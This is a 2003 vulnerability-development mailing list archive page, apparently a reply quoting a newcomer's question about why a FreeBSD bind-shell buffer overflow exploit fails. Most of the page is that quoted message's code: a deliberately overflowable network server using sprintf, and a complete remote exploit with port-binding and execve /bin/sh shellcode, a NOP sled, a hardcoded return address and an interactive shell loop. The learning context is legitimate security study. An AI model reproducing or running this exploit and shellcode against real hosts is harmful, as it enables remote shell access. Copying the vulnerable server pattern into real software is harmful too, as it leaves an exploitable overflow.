Vulnerability Development mailing list archives
Re: sample buffer overflow exploit problem
From: <upb () email ee>
Date: Sun, 28 Sep 2003 04:00:23 +0300
Hello
Is there anyway I can generate shellcodes in FreeBSD?
Learn asm. A good way to start is to read those books: http://www.intel.com/design/pentium/MANUALS/INDEX.HTM Then read a tutorial on calling the API exposed by the OS you want to 'generate' shellcodes on. ----- Original Message ----- From: "Ganbold" <ganbold () micom mng net> To: <vuln-dev () securityfocus com> Sent: Saturday, September 27, 2003 10:54 AM Subject: sample buffer overflow exploit problem
Hi,
I'm very new to buffer overflow exploit technics and my boss wants me to
thoroughly understand
how it works. I'm trying to exploit sample network server in FreeBSD 5.1
for this purpose.
When I try to exploit using execve /bin/sh (shellcode1), it works and
launches the shell in the remote machine.
However when I try to use port binding shell code, it binds shell to the
port, but when I try to connect to
it, it just closes the connection. Also I can't connect to bind port after
sending buffer using following code snippets:
..............
printf("[-] Connecting to bindshell...\n");
remote.sin_family = AF_INET;
remote.sin_addr = *((struct in_addr *)host->h_addr);
remote.sin_port = htons(12345);
if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
{
close(s);
fprintf(stderr, "Error: connect\n");
return -1;
}
exec_sh(s);
...............
I appreciate if somebody give me some help to solve this test problem.
Is there anywhere I can find detailed explanation about buffer overflows
and working sample network exploits?
Is there anyway I can generate shellcodes in FreeBSD?
I attached my sample server code and exploit code.
thanks in advance,
Ganbold Ts,
senior programmer,
Micom Co., Ltd
Ulaanbaatar,
Mongolia
Following is network server code:
--------------------------------------------------------------------------
------------------------------------------------------
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#define BUFFER_SIZE 1024
#define NAME_SIZE 2048
int handle(int c)
{
char buffer[BUFFER_SIZE], name[NAME_SIZE];
int bytes;
strcpy(buffer, "Your name?: ");
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
bytes = recv(c, name, sizeof(name), 0);
if (bytes == -1)
return -1;
name[bytes - 1] = '\0';
sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
return 0;
}
int main(int argc, char *argv[])
{
int s, c, cli_size;
struct sockaddr_in srv, cli;
if (argc != 2)
{
fprintf(stderr, "usage: %s port\n", argv[0]);
return 1;
}
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return 2;
}
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons( (unsigned short int) atol(argv[1]));
srv.sin_family = AF_INET;
if (bind(s, &srv, sizeof(srv)) == -1)
{
perror("bind() failed");
return 3;
}
if (listen(s, 3) == -1)
{
perror("listen() failed");
return 4;
}
for(;;)
{
c = accept(s, &cli, &cli_size);
if (c == -1)
{
perror("accept() failed");
return 5;
}
fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr));
if (handle(c) == -1)
fprintf(stderr, "%s: handle() failed", argv[0]);
close(c);
}
return 0;
}
--------------------------------------------------------------------------
------------------------------------------------------
Following is the sample exploit code: --------------------------------------------------------------------------
------------------------------------------------------
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#include <unistd.h>
/*
* FreeBSD shellcode - binds /bin/sh to a port 12345
*
* Claes M. Nyberg 20020619
*
* <cmn () darklab org>, <md0claes () mdstud chalmers se>
*/
char shellcode[]
=
/* port _______*/
"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
"\x40\x50\x50\xcd\x80";
/*
* FreeBSD shellcode - execve /bin/sh
*
* Claes M. Nyberg 20020120
*
* <cmn () darklab org>, <md0claes () mdstud chalmers se>
*/
char shellcode1[] =
"\x31\xc0" /* xorl %eax, %eax */
"\x50" /* pushl %eax */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp, %ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe2" /* movl %esp, %edx */
"\x50" /* pushl %eax */
"\x52" /* pushl %edx */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xb0\x3b" /* movb $0x3b, %al */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xorl %eax, %eax */
"\x40" /* inc %eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\xcd\x80"; /* int $0x80 */
#define RET 0xbfbffa48
int exec_sh(int sockfd)
{
char snd[4096],rcv[4096];
fd_set rset;
while(1)
{
FD_ZERO(&rset);
FD_SET(fileno(stdin),&rset);
FD_SET(sockfd,&rset);
select(255,&rset,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&rset))
{
memset(snd,0,sizeof(snd));
fgets(snd,sizeof(snd),stdin);
write(sockfd,snd,strlen(snd));
}
if(FD_ISSET(sockfd,&rset))
{
memset(rcv,0,sizeof(rcv));
if(read(sockfd,rcv,sizeof(rcv))<=0)
exit(0);
fputs(rcv,stdout);
}
}
}
int main(int argc, char *argv[]) {
char buffer[1064];
int s,t, i, size;
struct sockaddr_in remote;
struct hostent *host;
if(argc != 3) {
printf("Usage: %s target-ip port\n", argv[0]);
return -1;
}
// filling buffer with NOPs
memset(buffer, 0x90, 1064);
//copying shellcode into buffer
memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));
// the previous statement causes a unintential Nullbyte at buffer[1000]
buffer[1000] = 0x90;
// Copying the return address multiple times at the end of the buffer...
for(i=1022; i < 1059; i+=4) {
* ((int *) &buffer[i]) = RET;
}
buffer[1063] = 0x0;
//getting hostname
host=gethostbyname(argv[1]);
if (host==NULL)
{
fprintf(stderr, "Unknown Host %s\n",argv[1]);
return -1;
}
// creating socket...
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
{
fprintf(stderr, "Error: Socket\n");
return -1;
}
remote.sin_family = AF_INET;
remote.sin_addr = *((struct in_addr *)host->h_addr);
remote.sin_port = htons(atoi(argv[2]));
// connecting with destination host
if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
{
close(s);
fprintf(stderr, "Error: connect\n");
return -1;
}
//sending exploit string
size = send(s, buffer, sizeof(buffer), 0);
if (size==-1)
{
close(s);
fprintf(stderr, "sending data failed\n");
return -1;
}
/*
printf("[-] Connecting to bindshell...\n");
remote.sin_family = AF_INET;
remote.sin_addr = *((struct in_addr *)host->h_addr);
remote.sin_port = htons(12345);
if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
{
close(s);
fprintf(stderr, "Error: connect\n");
return -1;
}
exec_sh(s);
*/
// closing socket
close(s);
}
--------------------------------------------------------------------------
------------------------------------------------------
Current thread:
- sample buffer overflow exploit problem Ganbold (Sep 27)
- Message not available
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Message not available
- Re: sample buffer overflow exploit problem upb (Sep 29)
- <Possible follow-ups>
- Re: sample buffer overflow exploit problem deepcode . (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem Ganbold (Sep 29)
- Re: sample buffer overflow exploit problem sohlow (Sep 29)
- Re: sample buffer overflow exploit problem Vade 79 (Sep 30)
- RE: sample buffer overflow exploit problem Ganbold (Sep 30)
- Re: sample buffer overflow exploit problem Ganbold (Sep 30)
- Re: sample buffer overflow exploit problem Gerardo Richarte (Sep 30)